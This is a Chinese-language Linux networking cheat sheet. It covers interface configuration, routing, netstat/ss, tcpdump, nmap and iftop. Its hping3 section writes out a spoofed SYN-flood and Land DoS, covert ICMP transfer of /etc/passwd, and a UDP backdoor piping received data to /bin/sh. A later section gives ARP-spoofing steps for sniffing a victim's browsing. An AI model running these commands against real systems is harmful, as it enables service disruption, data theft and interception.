网卡类型：dmesg | grep -i ens33  或者lspci | grep -i net

查看网卡是否加载的：lsmod | grep e1000  （网卡型号：e1000）

加载网卡模块：modprobe eth100

如果想开开机自动加载modprobe模块：该文件在cd /etc/modprobe.d/ 这里面。 vim aaa.conf 文件编辑就可以自动加载。命令例如：（alias 网卡名 模块名）

无线网络查看：iwconfig  这个需要有网卡才能查看的到

ifconfig -a
ip addr show ens33
ip addr （显示当前激活的网卡状态信息）
ip link （查看端口连接状态）
ip addr flush dev eth0  （刷新ip地址信息）
Notice：刷新后IP地址将被取消[包括：/etc/sysconfig/network-scriipts]

[root@CentOS6 tmp]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:D1:23:78  
          inet addr:192.168.164.129  Bcast:192.168.164.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed1:2378/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:13531 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5871 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1085384 (1.0 MiB)  TX bytes:1376101 (1.3 MiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

A、ifcfg系列
    Grammar：ifconfig NETCARD    IP  NETMASK
1. # ifconfig eth0 192.168.200.200/24       （设置IP地址）
2. # ifconfig eth0 192.168.200.200 up
说明：这种方法也是可以的，它会自动添加子网掩码
3. # ifconfig eth0:1 192.168.211.100.10/24 up（这个也叫设置别名，Notice格式是设备名：1-n，如果要永久使用，可以写入配置文件）
                        以上3种较常用

4. # ifconfig ens33:1 192.168.10.10 255.255.255.0 
SIOCSIFADDR: 无效的参数
说明：这里虽然显示无效参数，但是这个事没有错的，我们用ifconfig查询时有IP的。
5. # ip addr add 192.168.217.100/24 dev ens33 label ens33:1
6. # ifconfig eth0:3 192.168.217.10 netmask 255.255.255.0 up
-----------------------------------------------------------------------------------------
Notice：
1、以上3、4、5、6，是以别名的方式添加ip；只能在当前有效，重启网络过后，ip又回到之前的那个ip
2、如果需要永久生效，写入配置文件，重启网络服务，就立即生效。

# vim /etc/sysconfig/network-scripts/ifcfg-eth0：查看网卡配置文件，并修改。

DEVICE=eth0 （设备名称）
HWADDR=00:0C:29:93:53:69    （MAC地址）
TYPE=Ethernet           （接口类型，以太网）
UUID=15cdfcc0-33f7-4bf9-bb7c-58e9f21226c3   （设备的全局标示符，用于内核所标示的代码UUID）
ONBOOT=yes  (在系统引导过程中，是否激活此接口）
NM_CONTROLLED=yes       （可以使用NetworkMangager来管理网络）
#BOOTPROTO=dhcp （激活此接口使用什么协议，常有选择dhcp、static、none）
BOOTPROTO=static    （静态获取）
IPADDR=         （指定IP地址）
NETMASK=            （指定子网掩码）
GATEWAY=            （指定网关）
DNS1=               （第一个DNS服务器指向。指向这个文件/etc/resolv.conf）
DNS2=               （第二个DNS服务器指向）
DNS3=               （第三个DNS服务器指向）
DOMAIN=         （定义域名）

DEVICE=eth0:1 （设备别名）
BOOTPROTO=static    （静态获取）
IPADDR=         （指定IP地址）
NETMASK=            （指定子网掩码）

route(Option)(参数)
Usage: route [-nNvee] [-FC] [<AF>]           List kernel routing tables
       route [-v] [-FC] {add|del|flush} ...  Modify routing table for AF.
       route {-h|--help} [<AF>]              Detailed usage syntax for specified AF.
       route {-V|--version}                  Display version/author and exit.

[root@test-6 ~]# route –n               (加-n不解析ip地址)
Kernel IP routing table
Destination     Gateway         Genmask       Flags  Metric  Ref    Use  Iface
192.168.211.0   0.0.0.0          255.255.255.0   U     1       0      0   eth0
0.0.0.0         192.168.211.2    0.0.0.0         UG    0       0      0   eth0

route add|del [-host|-net] IP地址 netmask [子网掩码] gw [网关] [dev 网卡名]

1、route add -host 192.168.211.0 gw 192.168.211.2  #增加一条到达192.168.211.0网段的路由；网关是192.168.122.2    
2、route add -net 192.168.55.0 netmask 255.255.255.0 gw 192.168.211.2 dev ens33

1、默认网关配置：
[root@test-6 ~]# route add default gw 192.168.217.1   
2、或者这样也可以添加网关：
[root@test-6 ~]# route add 0.0.0.0 gw 192.168.211.254
或者指明给哪张网卡配置网关：
[root@test-6 ~]# route add default gw 192.168.217.1 dev ens33 

netstat -a     #列出所有端口
netstat -at    #列出所有tcp端口
netstat -au    #列出所有udp端口      

netstat -l        #只显示监听端口
netstat -lt       #只列出所有监听 tcp 端口
netstat -lu       #只列出所有监听 udp 端口
netstat -lx       #只列出所有监听 UNIX 端口

netstat -s   #显示所有端口的统计信息
netstat -st   #显示TCP端口的统计信息
netstat -su   #显示UDP端口的统计信息

netstat -pt
netstat -p   #可以与其它开关一起使用，就可以添加“PID/进程名称”到netstat输出中，这样debugging的时候可以很方便的发现特定端口运行的程序。

#当你不想让主机，端口和用户名显示，使用netstat -n。将会使用数字代替那些名称。同样可以加速输出，因为不用进行比对查询。
netstat -an

netstat -a --numeric-ports
netsat -a --numeric-hosts
netsat -a --numeric-users

netstat -c   #每隔一秒输出网络信息

netstat --verbose
在输出的末尾，会有如下的信息：
netstat: no support for `AF IPX' on this system.
netstat: no support for `AF AX25' on this system.
netstat: no support for `AF X25' on this system.
netstat: no support for `AF NETROM' on this system.

#使用netstat -rn显示数字格式，不查询主机名称。
netstat -r

#并不是所有的进程都能找到，没有权限的会不显示，使用 root 权限查看所有的信息。
netstat -ap | grep ssh

netstat -an | grep ':80'

netstat -i
# 显示详细信息，像是ifconfig使用netstat -ie

#查看连接某服务端口最多的的IP地址：
netstat -ntu | grep :80 | awk '{print $5}' | cut -d: -f1 | awk '{++ip[$1]} END {for(i in ip) print ip[i],"\t",i}' | sort -nr

netstat -nt | grep -e 127.0.0.1 -e 0.0.0.0 -e ::: -v | awk '/^tcp/ {++state[$NF]} END {for(i in state) print i,"\t",state[i]}'

netstat -anpo | grep "php-cgi" | wc -l

netstat -ntulp | grep :80

# rpm -qf `which ss`
iproute-4.11.0-14.el7.x86_64

[root@test-6 ~]# ss -tan
State      Recv-Q Send-Q        Local Address:Port          Peer Address:Port
LISTEN     0      128               127.0.0.1:631                      *:*
………………………………………………………………………………………………
ESTAB      0      0           192.168.211.141:22           192.168.211.2:58571

[root@test-6 ~]# ss -s
Total: 886 (kernel 890)
TCP:   15 (estab 3, closed 0, orphaned 0, synrecv 0, timewait 0/0), ports 7

Transport Total     IP        IPv6
*         890       -         -
RAW       0         0         0
UDP       8         5         3
TCP       15        9         6
INET      23        14        9
FRAG      0         0         0

列出当前的established, closed, orphaned and waiting TCP sockets

[root@test-6 ~]# ss -l

[root@localhost ~]# ss -pl

[root@localhost ~]# ss -pl | grep 3306

[root@localhost ~]# ss -u -a

ss -s #是一个非常有用的命令。它可以按网络传输类型显示总体统计信息，我们不妨来测试一下

Total: 476 (kernel 692)
TCP:   123 (estab 73, closed 28, orphaned 0, synrecv 0, timewait 0/0), ports 0

Transport Total     IP        IPv6
*     692       -         -        
RAW   1         0         1        
UDP   3         1         2        
TCP   95        83        12       
INET      99        84        15       
FRAG      0         0         0        

参数解释：
RAW Socket 原始套接字。允许直接发送和接收 IP 数据包，无需满足特定的传输协议，用于 namp 等安全应用。
TCP 传输控制协议。是我们网络连接当中的主要连接协议。
UDP 用户数据报协议。类似于 TCP 但没有错误检查。
INET 包含上述项。（ INET4 和 INET6 可以通过一些 ss 命令单独查看）。
FRAG 可以理解为碎片的意思。

显然，上面的输出结果并没有直接显示详细的 socket 连接情况，我们可以看到最上面的 Total 行显示的 socket 总数是非常多的，不过，这种分类统计的方式在某些情况下很有用。
如果想要查看具体的 socket 活动信息，我们可以使用 ss -a 命令，但是我们要做好心理准备查看一大堆的信息，我们可以先用 wc -l 来统计一下行数试探一波：
$ ss -a | wc -l
330

有木有被吓到？330 行数据！
不过不必惊慌，我们可以查看指定类别的 socket 活动
ss     显示所有已经建立的 socket 连接
ss -ta 转储所有 TCP socket

ss -ua 转储所有 UDP socket

ss -wa 转储所有 RAW socket

ss -xa 转储所有 UNIX socket

ss -4a 转储所有 IPV4 socket

ss -6a 转储所有 IPV6 socket
ss -t   要查看刚建立的 TCP 连接
ss -lt  要仅显示监听 socket
ss -ltn 想要显示端口号而不是服务名


提供一些小技巧，你可以将那些最有用的选项转换为别名，能让你更容易使用。例如：
$ alias listen="ss -lt"
$ alias socksum="ss -s"

1 首先 添加dns服务器

vi /etc/resolv.conf
在文件中添加如下两行：
nameserver 8.8.8.8
保存退出。之后再ping 一次试一试

如果没有解决 继续：
2 设置一个文件：
vi /etc/sysconfig/network-scprits/ifcfg-ens33  (这个文件名称 可能会不同，我的是ens33 有的好像是ens 加上其他数字) 
在文件中 找到 ONBOOT=NO 改成 ONBOOT=yes
保存退出
重启网络： service network restart


Linux禁止ping以及开启ping的方法：

Linux默认是允许Ping响应的，系统是否允许Ping由2个因素决定的：A、内核参数，B、防火墙，需要2个因素同时允许才能允许Ping，2个因素有任意一个禁Ping就无法Ping。

#具体的配置方法如下：

 A、内核参数设置

    1、允许PING设置

        A.临时允许PING操作的命令为：# echo 0 >/proc/sys/net/ipv4/icmp_echo_ignore_all

        B.永久允许PING配置方法。

              /etc/sysctl.conf 中增加一行

　　            net.ipv4.icmp_echo_ignore_all=0

          如果已经有net.ipv4.icmp_echo_ignore_all这一行了，直接修改=号后面的值即可的（0表示允许，1表示禁止）。

          修改完成后执行sysctl -p使新配置生效。


    2、禁止Ping设置     

        A.临时禁止PING的命令为：#echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all     

        B.永久允许PING配置方法。

              在 /etc/sysctl.conf 文件中增加一行

　　           net.ipv4.icmp_echo_ignore_all=0

         如果已经有net.ipv4.icmp_echo_ignore_all这一行了，直接修改=号后面的值即可的。（0表示允许，1表示禁止）

         修改完成后执行sysctl -p使新配置生效。

 B、防火墙设置（注：此处的方法的前提是内核配置是默认值，也就是没有禁止Ping）

     这里以Iptables防火墙为例，其他防火墙操作方法可参考防火墙的官方文档。

    1、允许PING设置      

        iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT

        iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT

        或者也可以临时停止防火墙操作的。

        service iptables stop


    2、禁止PING设置

        iptables -A INPUT -p icmp --icmp-type 8 -s 0/0 -j DROP

安装fping命令：

# 先安装epel源：
yum install epel* -y
# 安装fping包：
yum install fping -y

选择性ping指定ip：
~]# fping 192.168.0.1 192.168.0.125 192.168.0.126 2>/dev/null
192.168.0.1 is alive
192.168.0.125 is alive
192.168.0.126 is unreachable

ping整个网段：
~]# fping -g 192.168.0.0/24 2>/dev/null
192.168.0.1 is alive
192.168.0.103 is alive
...
192.168.0.253 is unreachable
192.168.0.254 is unreachable

ping整个网段，只显示存活的主机：
~]# fping -ag 192.168.0.0/24 2>/dev/null
192.168.0.1
192.168.0.103
...

ping某一段ip：
~]# fping -ag 192.168.0.5 192.168.0.130 2>/dev/null
192.168.0.103
...
192.168.0.125
192.168.0.130

# 安装
yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

-H --help 显示帮助。

-v -VERSION 版本信息。

-c --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。

-i --interval 包发送间隔时间（单位是毫秒）缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast每秒发10个数据包。

-n -nmeric 数字输出，象征性输出主机地址。

-q -quiet 退出。

-I --interface interface name 无非就是eth0之类的参数。

-v --verbose 显示很多信息，TCP回应一般如：len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0

-D --debug 进入debug模式当你遇到麻烦时，比如用HPING遇到一些不合你习惯的时候，你可以用此模式修改HPING，（INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......）

-z --bind 快捷键的使用。

-Z --unbind 消除快捷键。

-O --rawip RAWIP模式，在此模式下HPING会发送带数据的IP头。

-1 --icmp ICMP模式，此模式下HPING会发送IGMP应答报，你可以用--ICMPTYPE 
--ICMPCODE选项发送其他类型/模式的ICMP报文。

-2 --udp UDP 模式，缺省下，HPING会发送UDP报文到主机的0端口，你可以用--baseport --destport --keep选项指定其模式。

-9 --listen signatuer hping的listen模式，用此模式，HPING会接收指定的数据。

-a --spoof hostname 伪造IP攻击，防火墙就不会记录你的真实IP了，当然回应的包你也接收不到了。

-t --ttl time to live 可以指定发出包的TTL值。

-H --ipproto 在RAW IP模式里选择IP协议。

-w --WINID UNIX,WINDIWS的id回应不同的，这选项可以让你的ID回应和WINDOWS一样。

-r --rel 更改ID的，可以让ID曾递减输出，详见HPING-HOWTO。

-F --FRAG 更改包的FRAG，这可以测试对方对于包碎片的处理能力，缺省的"virtualmtu"是16字节。

-x --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。

-y -dontfrag 发送不可恢复的IP碎片，这可以让你了解更多的MTU PATH DISCOVERY。

-G --fragoff fragment offset value set the fragment offset

-m --mtu mtu value 用此项后ID数值变得很大，50000没指定此项时3000-20000左右。

-G --rroute 记录路由，可以看到详悉的数据等等，最多可以经过9个路由，即使主机屏蔽了ICMP报文。

-C --ICMPTYPE type 指定ICMP类型，缺省是ICMP echo REQUEST。

-K --ICMPCODE CODE 指定ICMP代号，缺省0。

--icmp-ipver 把IP版本也插入IP头。

--icmp-iphlen 设置IP头的长度，缺省为5（32字节）。

--icmp-iplen 设置IP包长度。

--icmp-ipid 设置ICMP报文IP头的ID，缺省是RANDOM。

--icmp-ipproto 设置协议的，缺省是TCP。

-icmp-cksum 设置校验和。

-icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)

--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)

-s --baseport source port hping 用源端口猜测回应的包，它从一个基本端口计数，每收一个包，端口也加1，这规则你可以自己定义。

-p --deskport [+][+]desk port 设置目标端口，缺省为0，一个加号设置为:每发送一个请求包到达后，端口加1，两个加号为：每发一个包，端口数加1。

--keep 上面说过了。

-w --win 发的大小和windows一样大，64BYTE。

-O --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen /4.

-m --tcpseq 设置TCP序列数。

-l --tcpck 设置TCP ack。

-Q --seqnum 搜集序列号的，这对于你分析TCP序列号有很大作用。

# 防火墙测试
使用Hping3指定各种数据包字段，依次对防火墙进行详细测试。请参考：http://0daysecurity.com/articles/hping3_examples.html

测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击（DoS attack）。例如，以LandAttack方式测试目标防火墙（Land Attack是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。
hping3 -S  -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

# 端口扫描
Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放：
hping3 -I eth0  -S 192.168.10.1 -p 80
其中-I eth0指定使用eth0端口，-S指定TCP包的标志位SYN，-p 80指定探测的目的端口。

hping3支持非常丰富的端口探测方式，nmap拥有的扫描方式hping3几乎都支持（除开connect方式，因为Hping3仅发送与接收包，不会维护连接，所以不支持connect方式探测）。而且Hping3能够对发送的探测进行更加精细的控制，方便用户微调探测结果。当然，Hping3的端口扫描性能及综合处理能力，无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。

# Idle扫描
Idle扫描（Idle Scanning）是一种匿名扫描远程主机的方式，该方式也是有Hping3的作者Salvatore Sanfilippo发明的，目前Idle扫描在Nmap中也有实现。

该扫描原理是：寻找一台idle主机（该主机没有任何的网络流量，并且IPID是逐个增长的），攻击端主机先向idle主机发送探测包，从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包（此处假设为SYN包），此时如果远程主机的目的端口开放，那么会回复SYN/ACK，此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包，获取其IPID。那么对比两次的IPID值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。

# 拒绝服务攻击
使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
其他攻击如smurf、teardrop、land attack等也很容易构建出来。

# 文件传输
Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。在接收端开启服务：

hping3 192.168.1.159 --listen signature --safe  --icmp
监听ICMP包中的签名，根据签名解析出文件内容。

在发送端使用签名打包的ICMP包发送文件：
hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd
将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节（-d 100），发送签名为signature(-sign signature)。

# 木马功能
如果Hping3能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开shell通信。与netcat的后门功能类似。

示例：本地打开53号UDP端口（DNS解析服务）监听来自192.168.10.66主机的包含签名为signature的数据包，并将收到的数据调用/bin/sh执行。

在木马启动端：
hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh

在远程控制端：
echo ls >test.cmd
hping3 192.168.10.44 -p 53 -d 100 --udp --sign siganature --file ./test.cmd
将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口，包数据长度为100字节。

当然这里只是简单的演示程序，真实的场景，控制端可以利益shell执行很多的高级复杂的操作。

# 其它一些实例：
traceroute -m 10 www.baidu.com # 跳数设置->只查看10跳的结果
traceroute -n www.baidu.com    # 显示IP地址，不查主机名
traceroute -p 6888 www.baidu.com  # 探测包使用的基本UDP端口设置6888
traceroute -q 4 www.baidu.com  # 把探测包的个数设置为值4
traceroute -r www.baidu.com    # 绕过正常的路由表，直接发送到网络相连的主机
traceroute -w 3 www.baidu.com  # 把对外发探测包的等待响应时间设置为3秒

mtr -r -n -c 15 202.106.0.20

yum -y install tcpdump

# 下面是详细的tcpdump用法。
# tcpdump选项:
tcpdump [ -DenNqvX ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ]
        [ -s snaplen ] [ -w file ] [ expression ]

-i   表示监听那一个网卡; any代表所有
-s len：设置tcpdump的数据包抓取长度为len，如果不设置默认将会是65535字节。对于要抓取的数据包较大时，长度设置不够可能会产生包截断，若出现包截断，
      ：输出行中会出现"[|proto]"的标志(proto实际会显示为协议名)。**但是抓取len越长，包的处理时间越长**，并且会减少tcpdump可缓存的数据包的数量，
      ：从而会导致数据包的丢失，所以在能抓取我们想要的包的前提下，抓取长度越小越好
      **-s0  表示截取数据，s0抓整个包**
-n   表示数字显示主机名,不解析主机名
-nn  表示数字显示主机名跟端口号
-X   表示以ASCII码显示内容
-XX  表示以ASCII及16进制码显示内容
-A   表示显示原内容
-r<数据包文件> 从指定的文件读取数据包数据
src  源端口、地址
dst  目标端口、地址
-p：指定协议类型（icmp、tcp、udp、http
-w：表示将抓取的内容保存到某个位置（文件名.cap 这个后缀名的文件可以用Wireshark打开）
-c num：指定抓包个数
-i interface：指定tcpdump需要监听的接口。若未指定该选项，将从系统接口列表中搜寻编号最小的已配置好的接口(不包括loopback接口，要抓取loopback接口使用tcpdump -i lo)，一旦找到第一个符合条件的接口，搜寻马上结束。可以使用'any'关键字表示所有网络接口。
-c：指定要抓取的包数量。注意，是最终要获取这么多个包。例如，指定"-c 10"将获取10个包，但可能已经处理了100个包，只不过只有10个包是满足条件的包。
-n：对地址以数字方式显式，否则显式为主机名，也就是说-n选项不做主机名解析。
-nn：除了-n的作用外，还把端口显示为数值，否则显示端口服务名。
-N：不打印出host的域名部分。例如tcpdump将会打印'nic'而不是'nic.ddn.mil'。
-P：指定要抓取的包是流入还是流出的包。可以给定的值为"in"、"out"和"inout"，默认为"inout"。
-l：是标准输出变为缓冲行形式，可以把数据导出到文件。

-e：输出的每行中都将包括数据链路层头部信息，例如源MAC和目标MAC。
-q：快速打印输出。即打印很少的协议相关信息，从而输出行都比较简短。
-X：输出包的头部数据，会以16进制和ASCII两种方式同时输出。
-XX：输出包的头部数据，会以16进制和ASCII两种方式同时输出，更详细。
-v：当分析和打印的时候，产生详细的输出。
-vv：产生比-v更详细的输出。
-vvv：产生比-vv更详细的输出

-D：列出可用于抓包的接口。将会列出接口的数值编号和接口名，它们都可以用于"-i"后。
-F：从文件中读取抓包的表达式。若使用该选项，则命令行中给定的其他表达式都将失效。
-w：将抓包数据输出到文件中而不是标准输出。可以同时配合"-G time"选项使得输出文件每time秒就自动切换到另一个文件。可通过"-r"选项载入这些文件以进行分析和打印。
-r：从给定的数据包文件中读取数据。使用"-"表示从标准输入中读取。

tcpdump -D      #列出可用于抓包的接口
    #tcpdump -D
    1.bluetooth0 (Bluetooth adapter number 0)
    2.nflog (Linux netfilter log (NFLOG) interface)
    3.nfqueue (Linux netfilter queue (NFQUEUE) interface)
    4.usbmon1 (USB bus number 1)
    5.usbmon2 (USB bus number 2)
    6.ens33
    7.any (Pseudo-device that captures on all interfaces)
    8.lo [Loopback]




tcpdump -c num -i int -nn -XX -vvv


eg：
tcpdump -i eth1 -s0 -nn -A tcp dst port 3306 and ip dst host 192.168.1.150

# 例如：抓icmp包
shell> tcpdump -nn -i eth0 icmp

(1).默认启动
# tcpdump 
默认情况下，直接启动tcpdump将监视第一个网络接口(非lo口)上所有流通的数据包。这样抓取的结果会非常多，滚动非常快

(2).监视指定网络接口的数据包
# tcpdump -i eth1
如果不指定网卡，默认tcpdump只会监视第一个网络接口，如eth0

(3).监视指定主机的数据包，例如所有进入或离开longshuai的数据包
tcpdump host longshuai

(4).打印helios<-->hot或helios<-->ace之间通信的数据包
tcpdump host helios and ( hot or ace )

(5).打印ace与任何其他主机之间通信的IP数据包,但不包括与helios之间的数据包
tcpdump ip host ace and not helios

(6).截获主机hostname发送的所有数据
tcpdump src host hostname

(7).监视所有发送到主机hostname的数据包
tcpdump dst host hostname

(8).监视指定主机和端口的数据包
tcpdump tcp port 22 and host hostname

(9).对本机的udp 123端口进行监视(123为ntp的服务端口)
tcpdump udp port 123

(10).监视指定网络的数据包，如本机与192.168网段通信的数据包，"-c 10"表示只抓取10个包
tcpdump -c 10 net 192.168

(11).打印所有通过网关snup的ftp数据包(注意,表达式被单引号括起来了,这可以防止shell对其中的括号进行错误解析)
shell> tcpdump 'gateway snup and (port ftp or ftp-data)'

(12).抓取ping包
[root@server2 ~]# tcpdump -c 5 -nn -i eth0 icmp 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
08:35:45.772208 IP 172.20.10.2 > 172.20.10.3: ICMP redirect 172.20.10.1 to net 172.20.10.1, length 58
08:35:45.824730 IP 172.20.10.3 > 172.217.24.35: ICMP echo request, id 8168, seq 1, length 64
08:35:45.919827 IP 172.217.24.35 > 172.20.10.3: ICMP echo reply, id 8168, seq 1, length 64
08:35:46.827213 IP 172.20.10.3 > 172.217.24.35: ICMP echo request, id 8168, seq 2, length 64
08:35:46.827741 IP 172.20.10.2 > 172.20.10.3: ICMP redirect 172.217.24.35 to net 172.20.10.1, length 92
5 packets captured
5 packets received by filter
0 packets dropped by kernel

如果明确要抓取主机为192.168.100.70对本机的ping，则使用and操作符。
[root@server2 ~]# tcpdump -c 5 -nn -i eth0 icmp and src 192.168.100.62
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:09:33.208514 IP 192.168.100.70 > 192.168.100.62: ICMP echo request, id 16166, seq 4, length 64
12:09:34.292222 IP 192.168.100.70 > 192.168.100.62: ICMP echo request, id 16166, seq 5, length 64
packets captured
packets received by filter
packets dropped by kernel

注意不能直接写icmp src 192.168.100.70，因为icmp协议不支持直接应用host这个type。



(13).抓取到本机22端口包
[root@server2 ~]# tcpdump -c 10 -nn -i eth0 tcp dst port 22  
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:06:57.574293 IP 192.168.100.1.5788 > 192.168.100.62.22: Flags [.], ack 535528834, win 2053, length 0
12:06:57.629125 IP 192.168.100.1.5788 > 192.168.100.62.22: Flags [.], ack 193, win 2052, length 0
12:06:57.684688 IP 192.168.100.1.5788 > 192.168.100.62.22: Flags [.], ack 385, win 2051, length 0
12:06:58.069361 IP 192.168.100.1.5788 > 192.168.100.62.22: Flags [.], ack 1729, win 2052, length 0
packets captured
packets received by filter
packets dropped by kernel



(14).解析包数据
[root@server2 ~]# tcpdump -c 2 -q -XX -vvv -nn -i eth0 tcp dst port 22
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:15:54.788812 IP (tos 0x0, ttl 64, id 19303, offset 0, flags [DF], proto TCP (6), length 40)
    192.168.100.1.5788 > 192.168.100.62.22: tcp 0
        0x0000:  000c 2908 9234 0050 56c0 0008 0800 4500  ..)..4.PV.....E.
        0x0010:  0028 4b67 4000 4006 a5d8 c0a8 6401 c0a8  .(Kg@.@.....d...
        0x0020:  643e 169c 0016 2426 5fd6 1fec 2b62 5010  d>....$&_...+bP.
        0x0030:  0803 7844 0000 0000 0000 0000            ..xD........
12:15:54.842641 IP (tos 0x0, ttl 64, id 19304, offset 0, flags [DF], proto TCP (6), length 40)
    192.168.100.1.5788 > 192.168.100.62.22: tcp 0
        0x0000:  000c 2908 9234 0050 56c0 0008 0800 4500  ..)..4.PV.....E.
        0x0010:  0028 4b68 4000 4006 a5d7 c0a8 6401 c0a8  .(Kh@.@.....d...
        0x0020:  643e 169c 0016 2426 5fd6 1fec 2d62 5010  d>....$&_...-bP.
        0x0030:  0801 7646 0000 0000 0000 0000            ..vF........
packets captured
packets received by filter
packets dropped by kernel

总的来说，tcpdump对基本的数据包抓取方法还是较简单的。只要掌握有限的几个选项(-nn -XX -vvv -i -c -q)，再组合表达式即可

1、tcpdump -i eth0  或者wireshark

2、[root@test ~]# tcpdump -p icmp -i eth0

# 安装nmap
yum install nmap

nmap -sP ip 查看这个服务器当前网段有哪些机器运行的
nmap -A -T5 www.baidu.com   查看这个网页的基本信息 
nmap -sV ip 运行软件版本
nmap -O ip  操作系统版本 （不准确）
nmap -O --osscan-guess  ip （让系统帮忙猜测一下系统版本）

# 或者用sed进行修改配置文件：
setenforce 0
sed -i "s/SELINUX=enforcing/SELINUX=disabled/g" /etc/selinux/config

1、vim /proc/sys/net/ipv4/ip_forward
开启IP转发:echo 1 >/proc/sys/net/ipv4/ip_forward （开启转发功能,目的，是对方可以继续上网）

2、nmap –sP 192.168.2.0/24           （扫面这个网段的地址）
Nmap scan report for 192.168.2.220
Host is up (0.033s latency).
MAC Address: 00:0C:29:5E:74:7A (VMware)

3、可以深度扫描这个IP地址

4、[root@SAMBA ~]# arpspoof -i eth0 -t 192.168.2.220 192.168.2.1
192.168.2.220表示攻击的IP地址
192.168.2.1表示网关

5、[root@SAMBA ~]# arpspoof -i eth0 -t 192.168.2.1 192.168.2.200

6、[root@SAMBA ~]# urlsnarf -i eth0  (查看它浏览的什么网页)

7、[root@SAMBA ~]# driftent -i eth0  （打开监听窗口，到了这一步这一步，可以截获对方浏览的图片数据流）
创建一个保存图片的临时目录

8、开始嗅探

yum install flex byacc libpcap ncurses ncurses-devel libpcap-devel

apt-get install flex byacc libpcap0.8 libncurses5

wget http://www.ex-parrot.com/pdw/iftop/download/iftop-0.17.tar.gz

tar zxvf iftop-0.17.tar.gz

cd iftop-0.17

./configure

make && make install

    -i　　设定监测的网卡，如：# iftop -i eth1
    -B 　 以bytes为单位显示流量(默认是bits)，如：# iftop -B
    -n　　使host信息默认直接都显示IP，解析本身就会带来额外的网络流量；如：# iftop -n
    -N　　使端口信息默认直接都显示端口号，如: # iftop -N
    -F　　显示特定网段的进出流量，如# iftop -F 10.10.1.0/24或# iftop -F 10.10.1.0/255.255.255.0
    -h　　（display this message），帮助，显示参数信息
    -p　　使用这个参数后，中间的列表显示的本地主机信息，出现了本机以外的IP信息;
    -b　　使流量图形条，默认就显示;
    -f　　过滤计算包用的;
    -P　　使host信息及端口信息，默认就都显示;
    -m　　设置界面最上边的刻度的最大值，刻度分五个大段显示，例：# iftop -m 100M

    按h切换是否显示帮助;
    按n切换显示本机的IP或主机名;
    按s切换是否显示本机的host信息;
    按d切换是否显示远端目标主机的host信息;
    按t切换显示格式为2行/1行/只显示发送流量/只显示接收流量;
    按N切换显示端口号或端口服务名称;
    按S切换是否显示本机的端口信息;
    按D切换是否显示远端目标主机的端口信息;
    按p切换是否显示端口信息;
    按P切换暂停/继续显示;
    按b切换是否显示平均流量图形条;
    按B切换计算2秒或10秒或40秒内的平均流量;
    按T切换是否显示每个连接的总流量;
    按l打开屏幕过滤功能，输入要过滤的字符，比如ip,按回车后，屏幕就只显示这个IP相关的流量信息;
    按L切换显示画面上边的刻度;刻度不同，流量图形条会有变化;
    按j或按k可以向上或向下滚动屏幕显示的连接记录;
    按1或2或3可以根据右侧显示的三列流量数据进行排序;
    按<根据左边的本机名或IP排序;
    按>根据远端目标主机的主机名或IP排序;
